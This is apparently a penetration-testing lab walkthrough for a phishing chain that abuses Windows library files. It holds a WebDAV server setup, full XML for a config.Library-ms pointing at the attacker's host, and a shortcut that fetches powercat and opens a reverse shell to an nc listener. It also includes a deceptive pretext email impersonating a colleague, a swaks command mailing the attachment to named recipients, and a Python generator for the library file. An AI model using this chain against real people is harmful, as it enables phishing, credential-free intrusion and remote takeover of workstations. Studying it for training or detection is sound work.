Code execution via Windows Library Files


  • Set up a WebDAV share on Kali (this is the location the library file will make the victim's Explorer open)

    • mkdir /home/kali/webdav

    • cd ~/webdav

    • python -m venv .venv

    • source .venv/bin/activate

      • python -m pip install -U pip

      • python -m pip install wsgidav cheroot lxml

      • wsgidav --host=0.0.0.0 --port=80 --auth=anonymous -r /home/kali/webdav/

        • serves the directory anonymously on port 80, so the URL in the library file needs no port suffix; if wsgidav cannot bind port 80 as an unprivileged user, start it with sudo

  • Create two files on Windows

    • open the Windows machine

    • open VS Code

      • create a new file named config.Library-ms (a Windows library description; Explorer parses it as XML and displays the location it points to)

        • <?xml version="1.0" encoding="UTF-8"?>
          <libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
            <name>@windows.storage.dll,-34582</name>
            <version>6</version>
            <isLibraryPinned>true</isLibraryPinned>
            <iconReference>imageres.dll,-1003</iconReference>
            <templateInfo>
              <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
            </templateInfo>
            <searchConnectorDescriptionList>
              <searchConnectorDescription>
                <isDefaultSaveLocation>true</isDefaultSaveLocation>
                <isSupported>false</isSupported>
                <simpleLocation>
                  <url>http://192.168.119.2</url>
                </simpleLocation>
              </searchConnectorDescription>
            </searchConnectorDescriptionList>
          </libraryDescription>

        • save it on the Desktop; the <url> element is the only part that needs changing and must be the address of the Kali WebDAV server (192.168.119.2 here), which Explorer connects to through the WebClient service when the victim opens the library

      • create a shortcut file named install

        • right-click the Desktop, New > Shortcut

        • enter the command to run in the "location of the item" field; this is what executes when the victim double-clicks the shortcut, so in this chain it is a PowerShell one-liner that downloads powercat.ps1 from the HTTP server started below (port 8000) and starts a reverse shell to the nc listener (port 444). The wizard saves it as install.lnk.

    • transfer both files (config.Library-ms and install.lnk) to the WebDAV directory on Kali

  • In the WebDAV directory

    • nano body.txt

      • Hey! I checked mail and discovered that the previously used staging script still exists in the Git logs. I'll remove it for security reasons. On an unrelated note, please install the new security features on your workstation. For this, download the attached file, double-click on it, and execute the configuration shortcut within. Thanks! John

    • cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .

    • put the two files from Windows (config.Library-ms and install.lnk) here as well

    • python3 -m http.server 8000 (serves powercat.ps1 for the download command in the shortcut)

    • nc -nvlp 444 (listener for the reverse shell; the port must match the one used in the shortcut)

  • Now send the email; only config.Library-ms is attached, the shortcut is fetched from the WebDAV share once the victim opens the library

    sudo swaks -t daniela@beyond.com -t marcus@beyond.com --from john@beyond.com --attach @config.Library-ms --server 192.168.50.242 --body @body.txt --header "Subject: Staging Script" --suppress-data -ap

    • -ap (--auth-password) with no value makes swaks prompt for john's SMTP password; --suppress-data keeps the attachment bytes out of the session transcript
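The library file above can be generated and checked from Kali instead of being hand-edited in VS Code. The following Python script is an added example, not part of the original write-up: it builds config.Library-ms from the same XML with the WebDAV URL as a parameter, rejects anything that is not an http(s) URL (a UNC path in simpleLocation/url will not go through WebDAV), and parses a .Library-ms back to list the remote locations Explorer will contact when it is opened, which is the check to run before attaching the file and the same check a defender would run on a suspicious attachment. The host 192.168.119.2 and the WebDAV root /home/kali/webdav are the page's; the benign local-library sample used for comparison is constructed here.

```python
#!/usr/bin/env python3
"""Build and inspect the config.Library-ms used in the WebDAV phishing chain."""
import sys
import xml.etree.ElementTree as ET
from pathlib import Path
from urllib.parse import urlparse

LIBRARY_NS = "http://schemas.microsoft.com/windows/2009/library"

# Same library description as in the write-up; only the simpleLocation URL varies.
# Braces in the folderType GUID are doubled because str.format fills the template.
LIBRARY_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="{ns}">
  <name>@windows.storage.dll,-34582</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <templateInfo>
    <folderType>{{7d49d726-3c21-4f05-99aa-fdc2c9474656}}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>false</isSupported>
      <simpleLocation>
        <url>{url}</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""

# Constructed benign sample for comparison: a library pointing at a local known
# folder (the Documents folder GUID), the kind of entry a normal library holds.
LOCAL_LIBRARY_SAMPLE = LIBRARY_TEMPLATE.format(
    ns=LIBRARY_NS, url="knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}")


def build_library_ms(webdav_url: str) -> str:
    """Return Library-ms XML whose single location is webdav_url.

    Explorer resolves an http(s) URL here through the WebClient (WebDAV)
    service, so the share must be reachable at exactly this URL. Serving on
    port 80, as the wsgidav command in the write-up does, keeps it free of a
    port suffix.
    """
    parsed = urlparse(webdav_url)
    if parsed.scheme not in ("http", "https") or not parsed.netloc:
        raise ValueError(f"simpleLocation/url must be an http(s) URL, got {webdav_url!r}")
    return LIBRARY_TEMPLATE.format(ns=LIBRARY_NS, url=webdav_url)


def library_urls(xml_text: str) -> list[str]:
    """All simpleLocation/url values in a .Library-ms document, in order."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    found = root.findall(".//lib:simpleLocation/lib:url", {"lib": LIBRARY_NS})
    return [el.text.strip() for el in found if el.text]


def remote_library_urls(xml_text: str) -> list[str]:
    """Locations that make Explorer reach out over the network when opened.

    A benign library points at local paths or knownfolder:{GUID} entries;
    any http(s) URL is the tell for this technique.
    """
    return [u for u in library_urls(xml_text)
            if urlparse(u).scheme in ("http", "https")]


def write_library_ms(out_dir: Path, webdav_url: str) -> Path:
    """Write config.Library-ms into out_dir (the WebDAV root on Kali)."""
    out_dir.mkdir(parents=True, exist_ok=True)
    path = out_dir / "config.Library-ms"
    path.write_text(build_library_ms(webdav_url), encoding="utf-8")
    return path


if __name__ == "__main__":
    # Defaults are the page's Kali address and WebDAV root; override on the CLI.
    url = sys.argv[1] if len(sys.argv) > 1 else "http://192.168.119.2"
    out = Path(sys.argv[2]) if len(sys.argv) > 2 else Path("/home/kali/webdav")
    written = write_library_ms(out, url)
    print(f"wrote {written}; remote locations: {remote_library_urls(written.read_text())}")
```

Run it as `python3 make_library.py http://192.168.119.2 /home/kali/webdav` before starting wsgidav; the printed remote location is the one Explorer will open, so an empty list or a wrong host means the attachment will not reach the share.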
